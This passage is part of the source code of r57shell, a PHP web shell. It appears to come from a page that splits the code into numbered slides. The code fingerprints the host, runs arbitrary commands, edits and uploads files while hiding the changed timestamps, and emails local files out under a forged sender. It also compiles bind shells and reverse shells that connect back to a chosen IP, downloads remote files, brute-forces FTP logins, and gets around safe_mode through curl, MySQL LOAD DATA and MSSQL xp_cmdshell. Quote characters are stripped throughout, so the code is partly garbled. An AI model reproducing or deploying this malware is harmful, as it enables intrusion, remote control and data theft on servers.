str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print "<img src="http://127.0.0.1/r57shell/version.php?img=1&version=". $current_version."" border=0 height=0 width=0>"; @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} echo '<body bgcolor="#FFFFFF"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td bgcolor=#3A6EA5 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> </font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2>'; echo ws(2); echo "<b>".date ("d-m-Y H:i:s")."</b>"; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title="". $lang[$language.'_text46'].""><b>phpinfo</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title="". $lang[$language.'_text47'].""><b>php.ini</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title="". $lang[$language.'_text50'].""><b>cpu</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title="". $lang[$language.'_text51'].""><b>mem</b></a> ".$rb; if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title="". $lang[$language.'_text95'].""><b>users</b></a> ".$rb; } echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title="". $lang[$language.'_text48'].""><b>tmp</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title="". $lang[$language.'_text49'].""><b>delete</b></a> ".$rb."<br>"; echo ws(2); echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode: <b><font color=orange>OFF</font></b>")); echo ws(2); echo "PHP version: <b>".@phpversion()."</b>"; $curl_on = @function_exists('curl_version'); echo ws(2); echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font color=orange>OFF</font></b>")); echo ws(2); echo "MySQL: <b>";
  • 31. $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "<font color=white>ON</font></b>"; } else { echo "<font color=orange>OFF</font></b>"; } echo ws(2); echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";} echo ws(2); echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";} echo ws(2); echo "Oracle: <b>"; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";} echo "<br>".ws(2); echo "Disable functions : <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=white>NONE</font></b>";}else{echo "<font color=orange>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; echo '</font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>'; echo $font; if(!$windows){ echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=orange><b>"; $uname = ex('uname -a'); echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"): (ws(3).@substr(@php_uname(),0,120)."<br>")); if(!$safe_mode){ $bsd1 = ex('sysctl -n kern.ostype'); $bsd2 = ex('sysctl -n kern.osrelease'); $lin1 = ex('sysctl -n kernel.ostype'); $lin2 = ex('sysctl -n kernel.osrelease'); } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } else { $sysctl = "-"; } echo ws(3).$sysctl."<br>"; echo ws(3).ex('echo $OSTYPE')."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; $id = ex('id'); echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
  • 32. echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo "</b></font>"; } else { echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1) .'</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=orange><b>"; echo ws(3).@substr(@php_uname(),0,120)."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; echo ws(3).@get_current_user()."<br>"; echo ws(3).$dir; echo "<br></font>"; } echo "</font>"; echo "</td></tr></table>"; if(empty($c1)||empty($c2)) { die(); } $f = '<br>'; $f .= base64_decode($c1); $f .= base64_decode($c2); if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."r n"); mr($language,$res); $_POST['cmd']=""; } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && ! empty($_POST['loc_file'])) { if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } else { $filename = @basename($_POST['loc_file']); $filedump = @fread($file,@filesize($_POST['loc_file'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump ); if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); mr($language,$res); $_POST['cmd']=""; } } if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name ''.$_POST['s_mask'].'' | xargs grep -E ''.$_POST['s_text'].'''; }
  • 33. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']); break; case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break; case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break; } $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") { switch($_POST['what']) { case 'file': if($_POST['action'] == "create") { if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } else { fclose($file); $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd']="edit_file"; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>". $lang[$language.'_text61']."</b></font></div></td></tr></table>"; } } else if($_POST['action'] == "delete") { if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></ table>"; $_POST['cmd']=""; } break; case 'dir': if($_POST['action'] == "create"){ if(mkdir($_POST['mk_name'])) { $_POST['cmd']=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; } else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } } else if($_POST['action'] == "delete"){ if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></ table>";
  • 34. $_POST['cmd']=""; } break; } } if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } else { echo $table_up3; echo $font; echo "<form name=save_file method=post>"; echo ws(3)."<b>".$_POST['e_name']."</b>"; echo "<div align=center><textarea name=e_text cols=121 rows=24>"; echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); fclose($file); echo "</textarea>"; echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; echo "<input type=hidden name=dir value=".$dir.">"; echo "<input type=hidden name=cmd value=save_file>"; echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=" ".$lang[$language.'_butt10']." ">")); echo "</div>"; echo "</font>"; echo "</form>"; echo "</td></tr></table>"; exit(); } } if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") { $mtime = @filemtime($_POST['e_name']); if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } else { if($unix) $_POST['e_text']=@str_replace("rn","n",$_POST['e_text']); @fwrite($file,$_POST['e_text']); @touch($_POST['e_name'],$mtime,$mtime); $_POST['cmd']=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>". $lang[$language.'_text45']."</b></font></div></td></tr></table>"; } } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); $_POST['cmd']="ps -aux | grep bd"; } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
  • 35. $_POST['cmd']="ps -aux | grep bdpl"; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ". $_POST['port']." ...""; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ". $_POST['port']." ...""; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ". $_POST['remote_port']." &"); $_POST['cmd']="ps -aux | grep dp"; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="C")) { cf("/tmp/dpc.c",$datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ". $_POST['remote_host']." &"); $_POST['cmd']="ps -aux | grep dpc"; } if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } @copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['dir']."/".$nfn) or print("<font color=orange face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && ! empty($_POST['loc_file'])) { switch($_POST['with']) { case wget: $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
  • 36. break; case fetch: $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ". $_POST['rem_file'].""; break; case lynx: $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ". $_POST['loc_file'].""; break; case links: $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ". $_POST['loc_file'].""; break; case GET: $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; break; case curl: $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; break; } } if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); } else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } else { if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?(''):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'], $_POST['loc_file'],$_POST['mode']); } } } @ftp_close($connection); $_POST['cmd'] = ""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></ tr></table>"; $_POST['cmd'] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
  • 37. else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } echo $font.$lang[$language.'_text1'].": <b>". $_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; if($safe_mode) { switch($_POST['cmd']) { case 'safe_dir': $d=@dir($dir); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if($windows){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo date("d.m.Y H:i ",$mtime); } echo "$filen"; } $d->close(); } else echo $lang[$language._text29]; break; case 'safe_file': if(@is_file($_POST['file'])) { $file = @file($_POST['file']); if($file) { $c = @sizeof($file); for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } } else echo $lang[$language._text29]; } else echo $lang[$language._text31]; break; case 'test1': $ci = @curl_init("file://".$_POST['test1_file'].""); $cf = @curl_exec($ci); echo $cf; break; case 'test2': @include($_POST['test2_file']); break; case 'test3': if(!isset($_POST['test3_port'])||empty($_POST['test3_port']))
  • 38. { $_POST['test3_port'] = "3306"; } $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'], $_POST['test3_mp']); if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; @mysql_query($sql); $sql = "LOAD DATA INFILE "".$_POST['test3_file']."" INTO TABLE temp_r57_table;"; @mysql_query($sql); $sql = "SELECT * FROM temp_r57_table;"; $r = @mysql_query($sql); while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); } else echo "[-] ERROR! Can't select database"; @mysql_close($db); } else echo "[-] ERROR! Can't connect to mysql server"; break; case 'test4': if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'], $_POST['test4_mp']); if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db); @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '". $_POST['test4_file']."'",$db); $res = mssql_query("select * from r57_temp_table",$db); while(($row=@mssql_fetch_row($res))) { echo $row[0]."rn"; } @mssql_query("drop table r57_temp_table",$db); } else echo "[-] ERROR! Can't select database"; @mssql_close($db); } else echo "[-] ERROR! Can't connect to MSSQL server"; break; case 'test5': if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; @mb_send_mail(NULL, NULL, NULL, NULL, $extra); $lines = file ('/tmp/mb_send_mail'); foreach ($lines as $line) { echo htmlspecialchars($line)."rn"; } break; case 'test6':